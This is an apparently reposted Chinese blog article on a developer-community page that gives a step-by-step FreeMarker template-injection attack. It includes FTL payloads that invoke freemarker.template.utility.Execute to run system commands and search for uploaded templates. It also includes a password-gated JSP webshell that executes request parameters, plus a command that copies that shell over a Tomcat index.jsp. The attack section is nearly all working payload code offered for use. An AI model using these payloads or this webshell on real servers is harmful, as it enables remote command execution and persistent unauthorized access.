AI 助理
备案控制台
开发者社区 云计算 文章 正文

FreeMarker执行系统命令

2017-11-16 2290
版权
举报
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:

1、寻找可以上传FTL模板的漏洞点


2、尝试注入FTL模板

1
2
<#assign test="freemarker.template.utility.Execute"?new()>
${test("id")}


3、查找上传的FTL文件保存路径

1
2
<#assign test="freemarker.template.utility.Execute"?new()>
${test("find / -name *.ftl")}


4、获取WebShell

1
2
3
4
# webshell.ftl
<%if ("023".equals(request.getParameter("pwd")))
{java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1; byte[] b = new byte[2048];while((a=in.read(b))!=-1){out.println(new String(b));}}%>
1
2
3
4
# main.ftl
<#assign test="freemarker.template.utility.Execute"?new()>
${test("cp /home/bmpapp/upc_plugin_home/export_plugin/development/user/webshell.ftl 
/home/bmpapp/tomcat/webapps/default.war/index.jsp")}


5、访问index.jsp


















本文转自fatshi51CTO博客,原文链接:http://blog.51cto.com/duallay/1936931 ,如需转载请自行联系原作者




文章标签:
索引
技术小甜
目录
相关文章
camellia。
|
10月前
|
Java
cmd执行java程序,提示:Javac不是内部命令或外部命令~
cmd执行java程序,提示:Javac不是内部命令或外部命令~
camellia。
116 0
游客qsxez56gggwqy
|
5月前
|
设计模式 安全 前端开发
Struts2 S2-045远程执行代码漏东
Struts2 S2-045远程执行代码漏东
游客qsxez56gggwqy
52 0
游客n5wu27bgadceq
|
9月前
outreg2的命令代码详解
Stata结果输出:outreg2命令详解
游客n5wu27bgadceq
405 1
快乐阿超
|
10月前
|
SQL Java 关系型数据库
mybatis-plus启动时自动执行sql脚本
mybatis-plus启动时自动执行sql脚本
快乐阿超
249 1
程序员鸭哥
|
Oracle Java 关系型数据库
为什么Java注释里的代码被执行了?
为什么Java注释里的代码被执行了?
程序员鸭哥
436 0
为什么Java注释里的代码被执行了?
咖啡机(K.F.J)
|
缓存 自然语言处理 关系型数据库
PHP代码的执行
先看下PHP的结构图
咖啡机(K.F.J)
282 0
PHP代码的执行
eisc
|
Shell PHP Perl
shell 增删改查-文件操作大全
对文件和字符串进行增删改查
eisc
724 0
黑泽明军
|
Java
若想在当前路径下去运行非当前路径下的.class文件(即java可执行文件),该如何操作?
想在当前路径下去运行非当前路径下的.class文件(即java可执行文件),亦即可在任意目录下都可以执行java程序。 比如:  若 D:\Java\day01\set classpath=C:\mycode 后面没有分号,    该命令的意思是将java的运行文件所在路径告诉系统,则虚拟机在运行该类时就会到指定的目录中查找.class文件,若没找着,会报错;    若没有配置classpath路径时,虚拟机就会在当前路径下查找类文件,若没找着,会报错。
黑泽明军
1266 0
imzdx
|
Linux
Linux命令行下:把程序放后台执行,以及从后台继续执行程序
把任务放到后台用 & 和 Ctrl+z 让后台任务从停止状态转为运行状态用 bg %N 把后台任务调回到前台用 fg %N 查看所有任务用jobs
imzdx
2929 0
技术小阿哥
|
Shell
crontab中执行脚本中文乱码,手动执行没有问题的解决办法
技术小阿哥
2192 0